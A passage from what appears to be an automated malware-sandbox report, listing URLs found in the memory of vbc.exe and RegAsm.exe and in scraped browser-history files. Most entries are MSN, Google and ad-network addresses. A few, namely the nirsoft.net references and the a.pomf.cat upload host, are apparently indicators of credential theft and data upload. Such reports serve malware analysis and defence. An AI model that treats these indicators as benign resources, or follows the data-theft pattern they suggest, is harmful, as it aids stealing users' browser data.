Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/css/3bf20fde-50425371/directi
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/css/f60532dd-3aac3bb8/directi
Source: bhv7420.tmp.6.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/js/3bf20fde-2923b6c2/directio
Source: bhv7420.tmp.6.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/js/3bf20fde-b532f4eb/directio
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/js/f60532dd-2923b6c2/directio
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/js/f60532dd-f8dd99d9/directio
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/11/755f86.png
Source: bhv7420.tmp.6.dr, bhvBBC3.tmp.18.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/64/a8a064.gif
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/81/58b810.gif
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/86/2042ed.woff
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/9b/e151e5.gif
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/ea/4996b9.woff
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA61Ofl.img?h=16&w=16&m
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA7XCQ3.img?h=16&w=16&m
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AABzUSt.img?h=368&w=622
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADsAOZ.img?h=166&w=310
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADsZuW.img?h=166&w=310
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADuG4N.img?h=75&w=100&
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADuQtg.img?h=166&w=310
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADuTly.img?h=166&w=310
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADuTp7.img?h=333&w=311
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADuY5J.img?h=166&w=310
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADuZko.img?h=75&w=100&
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADuqZ9.img?h=75&w=100&
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADv4Ge.img?h=75&w=100&
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADv842.img?h=250&w=300
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADvbPR.img?h=250&w=300
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADvbce.img?h=333&w=311
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADvhNP.img?h=333&w=311
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADvoN9.img?h=166&w=310
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAyXiwM.img?h=16&w=16&m
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAyuliQ.img?h=16&w=16&m
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAzjSw3.img?h=16&w=16&m
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB16g6qc.img?h=27&w=27&
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17eTok.img?h=75&w=100
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB18T33l.img?h=166&w=31
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB18qTPD.img?h=16&w=16&
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19x3nX.img?h=166&w=31
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xGDT.img?h=333&w=31
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xJbM.img?h=75&w=100
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xaUu.img?h=166&w=31
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19yF6n.img?h=333&w=31
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19yKf2.img?h=250&w=30
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19ylKx.img?h=75&w=100
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19yuvA.img?h=250&w=30
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19ywNG.img?h=75&w=100
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19yxVU.img?h=166&w=31
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB46JmN.img?h=16&w=16&m
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB6Ma4a.img?h=16&w=16&m
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBMVUFn.img?h=16&w=16&m
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBO5Geh.img?h=16&w=16&m
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBPfCZL.img?h=27&w=27&m
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBRUB0d.img?h=16&w=16&m
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBVuddh.img?h=16&w=16&m
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBWoHwx.img?h=27&w=27&m
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBX2afX.img?h=27&w=27&m
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBi9v6.img?m=6&o=true&u
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBih5H.img?m=6&o=true&u
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBkwUr.img?h=16&w=16&m=
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBnYSFZ.img?h=16&w=16&m
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BByBEMv.img?h=16&w=16&m
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: http://support.google.com/accounts/answer/151657
Source: bhvBBC3.tmp.18.dr String found in binary or memory: http://www.google.com/
Source: bhv7420.tmp.6.dr String found in binary or memory: http://www.msn.com
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: http://www.msn.com/
Source: vbc.exe, 00000006.00000003.717957775.0000000002322000.00000004.00000001.sdmp, vbc.exe, 00000006.00000003.718336907.0000000002322000.00000004.00000001.sdmp, vbc.exe, 00000006.00000003.717882789.0000000002322000.00000004.00000001.sdmp, vbc.exe, 00000006.00000003.718069987.000000000232F000.00000004.00000001.sdmp, vbc.exe, 00000006.00000003.718028886.0000000002322000.00000004.00000001.sdmp, vbc.exe, 00000006.00000003.717712428.0000000002336000.00000004.00000001.sdmp, vbc.exe, 00000006.00000003.718471718.0000000002322000.00000004.00000001.sdmp, vbc.exe, 00000006.00000003.717781094.0000000002322000.00000004.00000001.sdmp, vbc.exe, 00000006.00000003.717689395.0000000002322000.00000004.00000001.sdmp, vbc.exe, 00000006.00000003.717735338.0000000002322000.00000004.00000001.sdmp, vbc.exe, 00000006.00000003.717830836.0000000002322000.00000004.00000001.sdmp, vbc.exe, 00000009.00000003.739322035.00000000022B2000.00000004.00000001.sdmp, vbc.exe, 00000009.00000003.739665751.00000000022BF000.00000004.00000001.sdmp, vbc.exe, 00000009.00000003.739148593.00000000022C6000.00000004.00000001.sdmp, vbc.exe, 00000009.00000003.739116233.00000000022B2000.00000004.00000001.sdmp, vbc.exe, 00000009.00000003.739920039.00000000022B2000.00000004.00000001.sdmp, vbc.exe, 00000009.00000003.739573266.00000000022B2000.00000004.00000001.sdmp, vbc.exe, 00000009.00000003.740025301.00000000022B2000.00000004.00000001.sdmp, vbc.exe, 00000009.00000003.739177781.00000000022B2000.00000004.00000001.sdmp, vbc.exe, 00000009.00000003.739468957.00000000022B2000.00000004.00000001.sdmp, vbc.exe, 00000009.00000003.739254376.00000000022B2000.00000004.00000001.sdmp, vbc.exe, 00000009.00000003.739360609.00000000022B2000.00000004.00000001.sdmp, vbc.exe, 00000012.00000003.898820172.0000000002472000.00000004.00000001.sdmp, vbc.exe, 00000012.00000003.898386702.0000000002472000.00000004.00000001.sdmp, vbc.exe, 00000012.00000003.898896783.000000000247F000.00000004.00000001.sdmp, vbc.exe, 00000012.00000003.899217998.0000000002472000.00000004.00000001.sdmp, vbc.exe, 00000012.00000003.898673572.0000000002472000.00000004.00000001.sdmp, vbc.exe, 00000012.00000003.898758123.0000000002472000.00000004.00000001.sdmp, vbc.exe, 00000012.00000003.898519488.0000000002472000.00000004.00000001.sdmp, vbc.exe, 00000012.00000003.898451200.0000000002472000.00000004.00000001.sdmp, vbc.exe, 00000012.00000003.898604564.0000000002472000.00000004.00000001.sdmp, vbc.exe, 00000012.00000003.899337695.0000000002472000.00000004.00000001.sdmp, vbc.exe, 00000012.00000003.898404145.0000000002486000.00000004.00000001.sdmp, bhv9842.tmp.9.dr, bhv7420.tmp.6.dr, bhvBBC3.tmp.18.dr String found in binary or memory: http://www.msn.com/?ocid=iehp
Source: bhv7420.tmp.6.dr, bhvBBC3.tmp.18.dr String found in binary or memory: http://www.msn.com/de-ch/?ocid=iehp
Source: bhv7420.tmp.6.dr String found in binary or memory: http://www.msn.com/de-ch/entertainment/_h/c920645c/webcore/externalscripts/oneTrustV2/consent/55a804
Source: bhv7420.tmp.6.dr String found in binary or memory: http://www.msn.com/de-ch/entertainment/_h/c920645c/webcore/externalscripts/oneTrustV2/scripttemplate
Source: vbc.exe, 00000006.00000002.720617113.000000000019C000.00000004.00000001.sdmp, vbc.exe, 00000009.00000002.744836903.000000000019C000.00000004.00000001.sdmp, vbc.exe, 00000012.00000002.901761923.000000000019C000.00000004.00000001.sdmp String found in binary or memory: http://www.nirsoft.net
Source: vbc.exe, vbc.exe, 00000012.00000000.890830654.0000000000400000.00000040.00000001.sdmp, vbc.exe, 00000012.00000002.901819390.0000000000400000.00000040.00000001.sdmp, vbc.exe, 00000012.00000000.889514635.0000000000400000.00000040.00000001.sdmp String found in binary or memory: http://www.nirsoft.net/
Source: vbc.exe, 00000006.00000003.718495583.000000000232F000.00000004.00000001.sdmp, vbc.exe, 00000009.00000003.740035971.00000000022BF000.00000004.00000001.sdmp, vbc.exe, 00000012.00000003.899359957.000000000247F000.00000004.00000001.sdmp, bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://172.217.23.78/
Source: vbc.exe, 00000006.00000003.717957775.0000000002322000.00000004.00000001.sdmp, vbc.exe, 00000006.00000003.717882789.0000000002322000.00000004.00000001.sdmp, vbc.exe, 00000006.00000003.718069987.000000000232F000.00000004.00000001.sdmp, vbc.exe, 00000006.00000003.718028886.0000000002322000.00000004.00000001.sdmp, vbc.exe, 00000006.00000003.717781094.0000000002322000.00000004.00000001.sdmp, vbc.exe, 00000006.00000003.717689395.0000000002322000.00000004.00000001.sdmp, vbc.exe, 00000006.00000003.717669606.0000000002337000.00000004.00000001.sdmp, vbc.exe, 00000006.00000003.717735338.0000000002322000.00000004.00000001.sdmp, vbc.exe, 00000006.00000003.717830836.0000000002322000.00000004.00000001.sdmp, vbc.exe, 00000009.00000003.739322035.00000000022B2000.00000004.00000001.sdmp, vbc.exe, 00000009.00000003.739665751.00000000022BF000.00000004.00000001.sdmp, vbc.exe, 00000009.00000003.739116233.00000000022B2000.00000004.00000001.sdmp, vbc.exe, 00000009.00000003.739573266.00000000022B2000.00000004.00000001.sdmp, vbc.exe, 00000009.00000003.739177781.00000000022B2000.00000004.00000001.sdmp, vbc.exe, 00000009.00000003.739468957.00000000022B2000.00000004.00000001.sdmp, vbc.exe, 00000009.00000003.739069223.00000000022C7000.00000004.00000001.sdmp, vbc.exe, 00000009.00000003.739254376.00000000022B2000.00000004.00000001.sdmp, vbc.exe, 00000009.00000003.739360609.00000000022B2000.00000004.00000001.sdmp, vbc.exe, 00000012.00000003.898820172.0000000002472000.00000004.00000001.sdmp, vbc.exe, 00000012.00000003.898386702.0000000002472000.00000004.00000001.sdmp, vbc.exe, 00000012.00000003.898896783.000000000247F000.00000004.00000001.sdmp, vbc.exe, 00000012.00000003.898673572.0000000002472000.00000004.00000001.sdmp, vbc.exe, 00000012.00000003.898758123.0000000002472000.00000004.00000001.sdmp, vbc.exe, 00000012.00000003.898519488.0000000002472000.00000004.00000001.sdmp, vbc.exe, 00000012.00000003.898451200.0000000002472000.00000004.00000001.sdmp, vbc.exe, 00000012.00000003.898604564.0000000002472000.00000004.00000001.sdmp, vbc.exe, 00000012.00000003.898345595.0000000002487000.00000004.00000001.sdmp, bhv9842.tmp.9.dr, bhv7420.tmp.6.dr, bhvBBC3.tmp.18.dr String found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=8072167097284;g
Source: bhv7420.tmp.6.dr, bhvBBC3.tmp.18.dr String found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=4510094
Source: RegAsm.exe, 00000005.00000002.933559504.00000000029C3000.00000004.00000001.sdmp String found in binary or memory: https://a.pomf.cat/
Source: bhv7420.tmp.6.dr String found in binary or memory: https://adservice.google.co.uk/adsid/google/si?gadsid=AORoGNRfxSclVePPTskt_ULwutuxovZBENP6CQBK41sqxH
Source: bhv7420.tmp.6.dr String found in binary or memory: https://adservice.google.co.uk/adsid/google/si?gadsid=AORoGNSN_Te_GQT33AAAR6UNrVcn3a-PGny50bSNsHlzoT
Source: bhv7420.tmp.6.dr String found in binary or memory: https://adservice.google.co.uk/adsid/google/ui?gadsid=AORoGNQXg7AHkvg6J6S0TqGFa_0HynGV3_XxYfs4fLINJG
Source: bhv7420.tmp.6.dr String found in binary or memory: https://adservice.google.co.uk/adsid/google/ui?gadsid=AORoGNRxRJyZzZp4KXfYTC7Z4q4fsi2jmRa8YGEqdB288n
Source: bhv7420.tmp.6.dr String found in binary or memory: https://adservice.google.com/adsid/google/si?gadsid=AORoGNSvKHbjRugN8Bruw1IrFif72u8bwsJvZ4BRSrMAhil_
Source: bhv7420.tmp.6.dr String found in binary or memory: https://adservice.google.com/adsid/google/si?gadsid=AORoGNTzML9SvDOPLAOFxwn751k-3cAoAULy2FWuSRb89C_P
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://adservice.google.com/adsid/google/ui
Source: bhv7420.tmp.6.dr, bhvBBC3.tmp.18.dr String found in binary or memory: https://adservice.google.com/ddm/fls/i/src=2542116;type=2542116;cat=chom0;ord=8072167097284;gtm=2wg9
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr, bhvBBC3.tmp.18.dr String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaot
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr, bhvBBC3.tmp.18.dr String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingrms
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://amp.azure.net/libs/amp/1.8.0/azuremediaplayer.min.js
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://apis.google.com/_/scs/abc-static/_/js/k=gapi.gapi.en.9Ky5Gf3gP0o.O/m=gapi_iframes
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://arc.msn.com/v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=314559&adm=
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC54c8a2b02c3446f48a60b41e8a5ff47
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC5bdddb231cf54f958a5b6e76e9d8eee
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC828bc1cde9f04b788c98b5423157734
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC9b2d2bc73c8a4a1d8dd5c3d69b6634a
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCc13122162a9a46c3b4cbf05ffccde0f
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCc71c68d7b8f049b6a6f3b669bd5d00c
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCee0d4d5fd4424c8390d703b105f82c3
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCfd484f9188564713bbc5d13d862ebbf
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://assets.adobedtm.com/launch-EN7b3d710ac67a4a1195648458258f97dd.min.js
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://az416426.vo.msecnd.net/scripts/a/ai.0.js
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://az725175.vo.msecnd.net/scripts/jsll-4.js
Source: vbc.exe, 00000006.00000003.717957775.0000000002322000.00000004.00000001.sdmp, vbc.exe, 00000006.00000003.717882789.0000000002322000.00000004.00000001.sdmp, vbc.exe, 00000006.00000003.718069987.000000000232F000.00000004.00000001.sdmp, vbc.exe, 00000006.00000003.718028886.0000000002322000.00000004.00000001.sdmp, vbc.exe, 00000006.00000003.717781094.0000000002322000.00000004.00000001.sdmp, vbc.exe, 00000006.00000003.717689395.0000000002322000.00000004.00000001.sdmp, vbc.exe, 00000006.00000003.717669606.0000000002337000.00000004.00000001.sdmp, vbc.exe, 00000006.00000003.717735338.0000000002322000.00000004.00000001.sdmp, vbc.exe, 00000006.00000003.717830836.0000000002322000.00000004.00000001.sdmp, vbc.exe, 00000009.00000003.739322035.00000000022B2000.00000004.00000001.sdmp, vbc.exe, 00000009.00000003.739665751.00000000022BF000.00000004.00000001.sdmp, vbc.exe, 00000009.00000003.739116233.00000000022B2000.00000004.00000001.sdmp, vbc.exe, 00000009.00000003.739573266.00000000022B2000.00000004.00000001.sdmp, vbc.exe, 00000009.00000003.739177781.00000000022B2000.00000004.00000001.sdmp, vbc.exe, 00000009.00000003.739468957.00000000022B2000.00000004.00000001.sdmp, vbc.exe, 00000009.00000003.739069223.00000000022C7000.00000004.00000001.sdmp, vbc.exe, 00000009.00000003.739254376.00000000022B2000.00000004.00000001.sdmp, vbc.exe, 00000009.00000003.739360609.00000000022B2000.00000004.00000001.sdmp, vbc.exe, 00000012.00000003.898820172.0000000002472000.00000004.00000001.sdmp, vbc.exe, 00000012.00000003.898386702.0000000002472000.00000004.00000001.sdmp, vbc.exe, 00000012.00000003.898896783.000000000247F000.00000004.00000001.sdmp, vbc.exe, 00000012.00000003.898673572.0000000002472000.00000004.00000001.sdmp, vbc.exe, 00000012.00000003.898758123.0000000002472000.00000004.00000001.sdmp, vbc.exe, 00000012.00000003.898519488.0000000002472000.00000004.00000001.sdmp, vbc.exe, 00000012.00000003.898451200.0000000002472000.00000004.00000001.sdmp, vbc.exe, 00000012.00000003.898604564.0000000002472000.00000004.00000001.sdmp, vbc.exe, 00000012.00000003.898345595.0000000002487000.00000004.00000001.sdmp, bhv9842.tmp.9.dr, bhv7420.tmp.6.dr, bhvBBC3.tmp.18.dr String found in binary or memory: https://consent.google.com/?hl=en-GB&origin=https://www.google.com&continue=https://www.google.com/?
Source: bhv7420.tmp.6.dr, bhvBBC3.tmp.18.dr String found in binary or memory: https://consent.google.com/done8?continue=https://www.google.com/?gws_rd%3Dssl&origin=https://www.go
Source: bhv7420.tmp.6.dr, bhvBBC3.tmp.18.dr String found in binary or memory: https://consent.google.com/set?pc=s&uxe=4421591
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://contextual.media.net/
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://contextual.media.net/48/nrrV18753.js
Source: bhv7420.tmp.6.dr String found in binary or memory: https://contextual.media.net/803288796/fcmain.js?&gdpr=0&cid=8CU157172&cpcd=pC3JHgSCqY8UHihgrvGr0A%3
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://contextual.media.net/__media__/js/util/nrrV9140.js
Source: bhvBBC3.tmp.18.dr String found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2
Source: bhv7420.tmp.6.dr, bhvBBC3.tmp.18.dr String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1
Source: bhv7420.tmp.6.dr, bhvBBC3.tmp.18.dr String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://cvision.media.net/new/100x75/2/249/241/157/ab7b8862-dfb2-4e59-a214-ff623600dbf5.jpg?v=9
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://cvision.media.net/new/100x75/2/89/162/29/8ee7a9a3-dec9-4d15-94e1-5c73b17d2de1.jpg?v=9
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://cvision.media.net/new/100x75/3/148/118/158/6d596081-b574-4a8a-9662-8f180c6f659f.jpg?v=9
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://cvision.media.net/new/286x175/2/249/241/157/ab7b8862-dfb2-4e59-a214-ff623600dbf5.jpg?v=9
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://cvision.media.net/new/286x175/3/148/118/158/6d596081-b574-4a8a-9662-8f180c6f659f.jpg?v=9
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://cvision.media.net/new/300x300/2/41/100/83/b5cbfa68-1c93-41c9-8797-4f9b532bc0b6.jpg?v=9
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://cvision.media.net/new/300x300/3/167/174/27/39ab3103-8560-4a55-bfc4-401f897cf6f2.jpg?v=9
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
Source: bhv7420.tmp.6.dr String found in binary or memory: https://dl.google.com/tag/s/appguid%3D%7B8A69D345-D564-463C-AFF1-A69D9E530F96%7D%26iid%3D%7B83C84637
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQE7dARJDf70CVtvXguPcFi4kAoAFTTEX3FZ_Kd&s=0
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQEZeIjizh9n8teY_8BOjsYtpLHwSdIq3PT-WQtot4&s=10
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQFso5PEv3c0kRR2gODJUq62DZF6fnxNsqKUTBX-00QeuCR
Source: bhv9842.tmp.9.dr, bhv7420.tmp.6.dr String found in binary or memory: https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQJBttAzO3yKFNSKzEm8qyQoBw2vbSHn0xMB0yhbgc&s=10
